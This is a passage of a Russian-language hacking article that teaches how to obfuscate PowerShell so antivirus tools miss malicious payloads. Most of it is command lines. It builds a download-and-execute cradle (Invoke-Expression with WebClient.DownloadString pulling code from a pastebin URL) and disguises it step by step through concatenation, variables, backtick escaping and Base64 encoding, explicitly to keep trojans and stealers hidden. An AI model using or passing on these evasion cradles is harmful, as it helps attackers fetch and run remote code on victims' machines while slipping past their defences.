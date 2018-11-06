В базах антивирусов содержатся миллионы сигнатур, однако трояны по-прежнему держатся в хакерском арсенале. Даже публичные и всем известные варианты полезных нагрузок Metasploit, разновидностей RAT и стиллеров могут остаться незамеченными. Как? Благодаря обфускации! Даже скрипт на PowerShell можно спрятать от любопытных глаз антивируса.

Посмотри на эту строку. Что ты здесь видишь?

;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n"^^e"t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "

Полагаю — ничего. А ведь это всего лишь команда netstat /ano после обфускации. В этой статье мы постараемся разобраться, как привести команды на PowerShell к такому виду, и проверим, как на это среагируют антивирусы.

WARNING Распространение вредоносного ПО преследуется по закону. Все рассмотренные методы представлены в ознакомительных целях.

PowerShell в хакинге

Начнем с разговора о самом PowerShell. Почему именно он часто используется при взломе? Ну, как минимум потому, что PowerShell — это командная оболочка и несложный скриптовый язык, который используется во всех современных системах Windows. К тому же большинство команд исполняется в памяти, что может помочь избежать антивирусного детекта. Если на компьютере включено удаленное управление, то можно получить доступ к системе через зашифрованный трафик. Существуют хорошие инструменты и фреймворки для работы с PowerShell. Также PowerShell можно вызывать из других скриптов и файлов .bat, .doc, .xls, .ppt, .hta, .exe, .dll.

С помощью PowerShell можно загружать код из интернета (к примеру, с pastebin.com) или файла на ПК и исполнять его. Для этого используется командлет Invoke-Expression . Вот несколько примеров использования.

Invoke-Expression -Command 'C:\directory\script.ps1' 'C:\directory\script.ps1' | Invoke-Expression Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/MKM5QLaP')

Также можно использовать кодировку Base64. Для начала следует закодировать команды в Base64.

[Convert]::ToBase64String( [System.Text.Encoding]::Unicode.GetBytes('Ваш код'))

Перед исполнением нужно будет декодировать их с помощью -EncodeCommand .

powershell -e RwBlAQALQBQAHIAbwBjGUAcwBzAA== powershell -enc RwBlAHALQBQAHIAbwBjAGUAcwBzAA== powershell -EncodedCommand RwBAHQALQBAHIAbwBjAGUAcwBzAA==

Есть куча других трюков с PowerShell. Для знакомства с основами и выбора инструментария рекомендую прочитать статью Алексея Панкратова «Выбираем среду разработки на PowerShell и пишем скрипты для Windows».

Обфускация PowerShell. Прятки с антивирусом

Процесс обфускации PowerShell не такой уж и сложный, так как это скриптовый язык и мы работаем со строками, а не с исполняемым двоичным кодом. Пройдемся по некоторым методам обфускации. Будем рассматривать все на примере этой команды:

Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/MKM5QLaP')

INFO Обфускация — один из популярных методов обхода сигнатурного анализа.

Для начала попробуем убрать System из строки System.Net.WebClient . На выполнение команды это не повлияет, так как в функциях .NET писать System необязательно.

Invoke-Expression (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/MKM5QLaP')

Посмотрим, что можно сделать еще. URL в нашей команде — это строка. Что можно делать со строками? Правильно — разделять и властвовать соединять, а вернее, конкатенировать. Попробуем это использовать.

Invoke-Expression (New-Object Net.WebClient).DownloadString('ht'+'t'+'ps:'+'//'+'pastebin.com/raw/MKM5QLaP')

Команда отрабатывает точно так же. Теперь попробуем часть команды объявить в виде переменной.

$get = New-Object Net.Webclient; Invoke-Expression $get.DownloadString('ht'+'t'+'ps:'+'//'+'pastebin.com/raw/MKM5QLaP')

Все отлично обфусцируется и работает. Идем дальше. Кручу-верчу, запутать хочу! DownloadString , наверное, используется хакерами уже сто лет. Запрячем его и New-Object среди “ и ` .

$get = New-Object "`N`et.`W`ebc`l`i`ent"; Invoke-Expression $get."D`o`wn`l`oa`d`Str`in`g"('ht'+'t'+'ps:'+'//'+'pastebin.com/raw/MKM5QLaP')

Неплохо замаскировали. Почти непонятно, что это на самом деле.